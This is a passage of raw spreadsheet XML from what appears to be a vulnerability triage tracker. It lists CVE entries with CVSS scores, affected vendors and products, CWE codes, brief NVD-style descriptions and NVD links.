s="5" t="inlineStr"><is><t>CVE-2026-71375</t></is></c><c r="D809" s="5" t="n"><v>7.4</v></c><c r="E809" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F809" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G809" s="5" t="inlineStr" /><c r="H809" s="5" t="n"><v>0.002</v></c><c r="I809" s="5" t="inlineStr" /><c r="J809" s="5" t="inlineStr" /><c r="K809" s="5" t="inlineStr" /><c r="L809" s="5" t="inlineStr" /><c r="M809" s="5" t="inlineStr" /><c r="N809" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O809" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P809" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q809" s="5" t="inlineStr" /><c r="R809" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="S809" s="5" t="inlineStr"><is><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809" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71375</t></is></c></row><row r="810"><c r="A810" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B810" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C810" s="5" t="inlineStr"><is><t>CVE-2026-76196</t></is></c><c r="D810" s="5" t="n"><v>7.4</v></c><c r="E810" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F810" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G810" s="5" t="inlineStr" /><c r="H810" s="5" t="n"><v>0.002</v></c><c r="I810" s="5" t="inlineStr" /><c r="J810" s="5" t="inlineStr" /><c r="K810" s="5" t="inlineStr"><is><t>adobe:photoshop_mobile</t></is></c><c r="L810" s="5" t="inlineStr" /><c r="M810" s="5" t="inlineStr" /><c r="N810" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O810" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P810" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q810" s="5" t="inlineStr" /><c r="R810" s="5" t="inlineStr"><is><t>CWE-384</t></is></c><c r="S810" s="5" t="inlineStr"><is><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is></c><c r="T810" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76196</t></is></c></row><row r="811"><c r="A811" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B811" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C811" s="5" t="inlineStr"><is><t>CVE-2026-78461</t></is></c><c r="D811" s="5" t="n"><v>7.4</v></c><c r="E811" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F811" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G811" s="5" t="inlineStr" /><c r="H811" s="5" t="n"><v>0.01</v></c><c r="I811" s="5" t="inlineStr" /><c r="J811" s="5" t="inlineStr" /><c r="K811" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L811" s="5" t="inlineStr" /><c r="M811" s="5" t="inlineStr" /><c r="N811" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O811" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P811" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q811" s="5" t="inlineStr" /><c r="R811" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S811" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T811" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78461</t></is></c></row><row r="812"><c r="A812" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B812" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C812" s="5" t="inlineStr"><is><t>CVE-2026-81383</t></is></c><c r="D812" s="5" t="n"><v>7.4</v></c><c r="E812" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F812" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G812" s="5" t="inlineStr" /><c r="H812" s="5" t="n"><v>0.007</v></c><c r="I812" s="5" t="inlineStr" /><c r="J812" s="5" t="inlineStr" /><c r="K812" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L812" s="5" t="inlineStr" /><c r="M812" s="5" t="inlineStr" /><c r="N812" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O812" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P812" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q812" s="5" t="inlineStr" /><c r="R812" s="5" t="inlineStr"><is><t>CWE-706</t></is></c><c r="S812" s="5" t="inlineStr"><is><t>Use of incorrectly-resolved name or reference in Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T812" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81383</t></is></c></row><row r="813"><c r="A813" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B813" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C813" s="5" t="inlineStr"><is><t>CVE-2026-84003</t></is></c><c r="D813" s="5" t="n"><v>7.4</v></c><c r="E813" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F813" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G813" s="5" t="inlineStr" /><c r="H813" s="5" t="n"><v>0.004</v></c><c r="I813" s="5" t="inlineStr" /><c r="J813" s="5" t="inlineStr" /><c r="K813" s="5" t="inlineStr"><is><t>microsoft:azure\/msal-node</t></is></c><c r="L813" s="5" t="inlineStr" /><c r="M813" s="5" t="inlineStr" /><c r="N813" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O813" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P813" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q813" s="5" t="inlineStr" /><c r="R813" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="S813" s="5" t="inlineStr"><is><t>Authentication bypass by capture-replay in Microsoft Authentication Library (MSAL) for Node.js allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T813" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84003</t></is></c></row><row r="814"><c r="A814" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B814" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C814" s="5" t="inlineStr"><is><t>CVE-2026-28613</t></is></c><c r="D814" s="5" t="n"><v>7.3</v></c><c r="E814" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F814" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G814" s="5" t="inlineStr" /><c r="H814" s="5" t="n"><v>0.001</v></c><c r="I814" s="5" t="inlineStr" /><c r="J814" s="5" t="inlineStr" /><c r="K814" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L814" s="5" t="inlineStr" /><c r="M814" s="5" t="inlineStr" /><c r="N814" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O814" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P814" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q814" s="5" t="inlineStr" /><c r="R814" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S814" s="5" t="inlineStr"><is><t>In initAppLinkTypeAndIntent of ChannelImpl.java, there is a possible launch an arbitrary intent due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="T814" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28613</t></is></c></row><row r="815"><c r="A815" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B815" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C815" s="5" t="inlineStr"><is><t>CVE-2026-28626</t></is></c><c r="D815" s="5" t="n"><v>7.3</v></c><c r="E815" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F815" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G815" s="5" t="inlineStr" /><c r="H815" s="5" t="n"><v>0.001</v></c><c r="I815" s="5" t="inlineStr" /><c r="J815" s="5" t="inlineStr" /><c r="K815" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L815" s="5" t="inlineStr" /><c r="M815" s="5" t="inlineStr" /><c r="N815" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O815" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P815" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q815" s="5" t="inlineStr" /><c r="R815" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S815" s="5" t="inlineStr"><is><t>In onCreate of SetupPassthroughActivity.java, there is a possible way to launch arbitrary activity due to Intent redirection . This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="T815" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28626</t></is></c></row><row r="816"><c r="A816" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B816" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C816" s="5" t="inlineStr"><is><t>CVE-2026-28656</t></is></c><c r="D816" s="5" t="n"><v>7.3</v></c><c r="E816" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F816" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G816" s="5" t="inlineStr" /><c r="H816" s="5" t="n"><v>0.001</v></c><c r="I816" s="5" t="inlineStr" /><c r="J816" s="5" t="inlineStr" /><c r="K816" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L816" s="5" t="inlineStr" /><c r="M816" s="5" t="inlineStr" /><c r="N816" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O816" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P816" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q816" s="5" t="inlineStr" /><c r="R816" s="5" t="inlineStr"><is><t>CWE-1021</t></is></c><c r="S816" s="5" t="inlineStr"><is><t>In multiple functions of DeviceAdminAdd.java, there is a possible way to an overlay due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="T816" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28656</t></is></c></row><row r="817"><c r="A817" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B817" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C817" s="5" t="inlineStr"><is><t>CVE-2026-45528</t></is></c><c r="D817" s="5" t="n"><v>7.3</v></c><c r="E817" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F817" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G817" s="5" t="inlineStr" /><c r="H817" s="5" t="n"><v>0.001</v></c><c r="I817" s="5" t="inlineStr" /><c r="J817" s="5" t="inlineStr" /><c r="K817" s="5" t="inlineStr" /><c r="L817" s="5" t="inlineStr" /><c r="M817" s="5" t="inlineStr" /><c r="N817" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O817" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P817" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q817" s="5" t="inlineStr" /><c r="R817" s="5" t="inlineStr"><is><t>CWE-926</t></is></c><c r="S817" s="5" t="inlineStr"><is><t>In getManageSpaceActivityIntent of StorageManagerService.java, there is a possible LaunchAnyWhere chain due to an unsafe PendingIntent. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="T817" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45528</t></is></c></row><row r="818"><c r="A818" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B818" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C818" s="5" t="inlineStr"><is><t>CVE-2026-69477</t></is></c><c r="D818" s="5" t="n"><v>7.3</v></c><c r="E818" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F818" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G818" s="5" t="inlineStr" /><c r="H818" s="5" t="n"><v>0.004</v></c><c r="I818" s="5" t="inlineStr" /><c r="J818" s="5" t="inlineStr" /><c r="K818" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L818" s="5" t="inlineStr" /><c r="M818" s="5" t="inlineStr" /><c r="N818" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O818" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P818" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q818" s="5" t="inlineStr" /><c r="R818" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S818" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Access allows an authorized attacker to execute code locally.</t></is></c><c r="T818" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69477</t></is></c></row><row r="819"><c r="A819" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B819" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C819" s="5" t="inlineStr"><is><t>CVE-2026-78627</t></is></c><c r="D819" s="5" t="n"><v>7.3</v></c><c r="E819" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F819" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G819" s="5" t="inlineStr" /><c r="H819" s="5" t="n"><v>0.001</v></c><c r="I819" s="5" t="inlineStr" /><c r="J819" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K819" s="5" t="inlineStr" /><c r="L819" s="5" t="inlineStr" /><c r="M819" s="5" t="inlineStr" /><c r="N819" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O819" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P819" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q819" s="5" t="inlineStr" /><c r="R819" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="S819" s="5" t="inlineStr"><is><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is></c><c r="T819" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78627</t></is></c></row><row r="820"><c r="A820" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B820" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C820" s="5" t="inlineStr"><is><t>CVE-2026-86806</t></is></c><c r="D820" s="5" t="n"><v>7.3</v></c><c r="E820" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F820" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G820" s="5" t="inlineStr" /><c r="H820" s="5" t="n"><v>0.005</v></c><c r="I820" s="5" t="inlineStr" /><c r="J820" s="5" t="inlineStr" /><c r="K820" s="5" t="inlineStr" /><c r="L820" s="5" t="inlineStr" /><c r="M820" s="5" t="inlineStr" /><c r="N820" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O820" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P820" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q820" s="5" t="inlineStr" /><c r="R820" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S820" s="5" t="inlineStr"><is><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is></c><c r="T820" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86806</t></is></c></row><row r="821"><c r="A821" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B821" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C821" s="5" t="inlineStr"><is><t>CVE-2026-76561</t></is></c><c r="D821" s="5" t="n"><v>7.2</v></c><c r="E821" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F821" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G821" s="5" t="inlineStr" /><c r="H821" s="5" t="n"><v>0.006</v></c><c r="I821" s="5" t="inlineStr" /><c r="J821" s="5" t="inlineStr" /><c r="K821" s="5" t="inlineStr" /><c r="L821" s="5" t="inlineStr" /><c r="M821" s="5" t="inlineStr" /><c r="N821" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O821" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P821" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q821" s="5" t="inlineStr" /><c r="R821" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S821" s="5" t="inlineStr"><is><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is></c><c r="T821" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76561</t></is></c></row><row r="822"><c r="A822" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B822" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C822" s="5" t="inlineStr"><is><t>CVE-2026-81349</t></is></c><c r="D822" s="5" t="n"><v>7.2</v></c><c r="E822" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F822" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G822" s="5" t="inlineStr" /><c r="H822" s="5" t="n"><v>0.007</v></c><c r="I822" s="5" t="inlineStr" /><c r="J822" s="5" t="inlineStr" /><c r="K822" s="5" t="inlineStr" /><c r="L822" s="5" t="inlineStr" /><c r="M822" s="5" t="inlineStr" /><c r="N822" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O822" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P822" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q822" s="5" t="inlineStr" /><c r="R822" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S822" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an os command ('os command injection') in Azure HDInsights allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T822" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81349</t></is></c></row><row r="823"><c r="A823" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B823" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C823" s="5" t="inlineStr"><is><t>CVE-2026-81806</t></is></c><c r="D823" s="5" t="n"><v>7.2</v></c><c r="E823" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F823" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G823" s="5" t="inlineStr" /><c r="H823" s="5" t="n"><v>0.002</v></c><c r="I823" s="5" t="inlineStr" /><c r="J823" s="5" t="inlineStr" /><c r="K823" s="5" t="inlineStr" /><c r="L823" s="5" t="inlineStr" /><c r="M823" s="5" t="inlineStr" /><c r="N823" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O823" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P823" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q823" s="5" t="inlineStr" /><c r="R823" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S823" s="5" t="inlineStr"><is><t>Server-Side Request Forgery (SSRF) vulnerability in John Darrel Hide My WP Ghost allows Server Side Request Forgery.

This issue affects Hide My WP Ghost: from n/a through 7.0.09.</t></is></c><c r="T823" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81806</t></is></c></row><row r="824"><c r="A824" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B824" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C824" s="5" t="inlineStr"><is><t>CVE-2026-82061</t></is></c><c r="D824" s="5" t="n"><v>7.2</v></c><c r="E824" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F824" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G824" s="5" t="inlineStr" /><c r="H824" s="5" t="n"><v>0.003</v></c><c r="I824" s="5" t="inlineStr" /><c r="J824" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K824" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L824" s="5" t="inlineStr" /><c r="M824" s="5" t="inlineStr" /><c r="N824" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O824" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P824" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q824" s="5" t="inlineStr" /><c r="R824" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S824" s="5" t="inlineStr"><is><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is></c><c r="T824" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82061</t></is></c></row><row r="825"><c r="A825" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B825" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C825" s="5" t="inlineStr"><is><t>CVE-2026-82071</t></is></c><c r="D825" s="5" t="n"><v>7.2</v></c><c r="E825" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F825" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G825" s="5" t="inlineStr" /><c r="H825" s="5" t="n"><v>0.003</v></c><c r="I825" s="5" t="inlineStr" /><c r="J825" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K825" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L825" s="5" t="inlineStr" /><c r="M825" s="5" t="inlineStr" /><c r="N825" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O825" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P825" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q825" s="5" t="inlineStr" /><c r="R825" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S825" s="5" t="inlineStr"><is><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is></c><c r="T825" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82071</t></is></c></row><row r="826"><c r="A826" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B826" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C826" s="5" t="inlineStr"><is><t>CVE-2026-84387</t></is></c><c r="D826" s="5" t="n"><v>7.2</v></c><c r="E826" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F826" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G826" s="5" t="inlineStr" /><c r="H826" s="5" t="n"><v>0.008999999999999999</v></c><c r="I826" s="5" t="inlineStr" /><c r="J826" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K826" s="5" t="inlineStr" /><c r="L826" s="5" t="inlineStr" /><c r="M826" s="5" t="inlineStr" /><c r="N826" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O826" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P826" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q826" s="5" t="inlineStr" /><c r="R826" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="S826" s="5" t="inlineStr"><is><t>A improper neutralization of special elements used in a command ('command injection') vulnerability in Fortinet FortiSandbox 5.2.0, FortiSandbox 5.0.0 through 5.0.6, FortiSandbox 4.4.0 through 4.4.9 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t></is></c><c r="T826" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84387</t></is></c></row><row r="827"><c r="A827" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B827" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C827" s="5" t="inlineStr"><is><t>CVE-2026-86733</t></is></c><c r="D827" s="5" t="n"><v>7.2</v></c><c r="E827" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F827" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G827" s="5" t="inlineStr" /><c r="H827" s="5" t="n"><v>0.003</v></c><c r="I827" s="5" t="inlineStr" /><c r="J827" s="5" t="inlineStr" /><c r="K827" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L827" s="5" t="inlineStr" /><c r="M827" s="5" t="inlineStr" /><c r="N827" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O827" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P827" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q827" s="5" t="inlineStr" /><c r="R827" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S827" s="5" t="inlineStr"><is><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is></c><c r="T827" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86733</t></is></c></row><row r="828"><c r="A828" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B828" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C828" s="5" t="inlineStr"><is><t>CVE-2026-11573</t></is></c><c r="D828" s="5" t="n"><v>7.1</v></c><c r="E828" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F828" s="5" t="inlineStr"><is><t>a59d8014-47c4-4630-ab43-e1b13cbe58e3</t></is></c><c r="G828" s="5" t="inlineStr" /><c r="H828" s="5" t="n"><v>0.004</v></c><c r="I828" s="5" t="inlineStr" /><c r="J828" s="5" t="inlineStr" /><c r="K828" s="5" t="inlineStr" /><c r="L828" s="5" t="inlineStr" /><c r="M828" s="5" t="inlineStr" /><c r="N828" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O828" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P828" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q828" s="5" t="inlineStr" /><c r="R828" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="S828" s="5" t="inlineStr"><is><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is></c><c r="T828" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-11573</t></is></c></row><row r="829"><c r="A829" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B829" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C829" s="5" t="inlineStr"><is><t>CVE-2026-16769</t></is></c><c r="D829" s="5" t="n"><v>7.1</v></c><c r="E829" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F829" s="5" t="inlineStr"><is><t>product-security@silabs.com</t></is></c><c r="G829" s="5" t="inlineStr" /><c r="H829" s="5" t="n"><v>0.001</v></c><c r="I829" s="5" t="inlineStr" /><c r="J829" s="5" t="inlineStr" /><c r="K829" s="5" t="inlineStr" /><c r="L829" s="5" t="inlineStr" /><c r="M829" s="5" t="inlineStr" /><c r="N829" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O829" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P829" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q829" s="5" t="inlineStr" /><c r="R829" s="5" t="inlineStr"><is><t>CWE-440</t></is></c><c r="S829" s="5" t="inlineStr"><is><t>An unencrypted 'pause encryption request' message causes a denial of service in the in the RS9116W/SiWx917. See vulnerability B-E10 in the related paper below.</t></is></c><c r="T829" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16769</t></is></c></row><row r="830"><c r="A830" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B830" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C830" s="5" t="inlineStr"><is><t>CVE-2026-20293</t></is></c><c r="D830" s="5" t="n"><v>7.1</v></c><c r="E830" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F830" s="5" t="inlineStr"><is><t>psirt@cisco.com</t></is></c><c r="G830" s="5" t="inlineStr" /><c r="H830" s="5" t="n"><v>0.001</v></c><c r="I830" s="5" t="inlineStr" /><c r="J830" s="5" t="inlineStr"><is><t>cisco</t></is></c><c r="K830" s="5" t="inlineStr" /><c r="L830" s="5" t="inlineStr" /><c r="M830" s="5" t="inlineStr" /><c r="N830" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O830" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P830" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q830" s="5" t="inlineStr" /><c r="R830" s="5" t="inlineStr"><is><t>CWE-749</t></is></c><c r="S830" s="5" t="inlineStr"><is><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is></c><c r="T830" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-20293</t></is></c></row><row r="831"><c r="A831" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B831" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C831" s="5" t="inlineStr"><is><t>CVE-2026-66305</t></is></c><c r="D831" s="5" t="n"><v>7.1</v></c><c r="E831" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F831" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G831" s="5" t="inlineStr" /><c r="H831" s="5" t="n"><v>0.003</v></c><c r="I831" s="5" t="inlineStr" /><c r="J831" s="5" t="inlineStr" /><c r="K831" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L831" s="5" t="inlineStr" /><c r="M831" s="5" t="inlineStr" /><c r="N831" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O831" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P831" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q831" s="5" 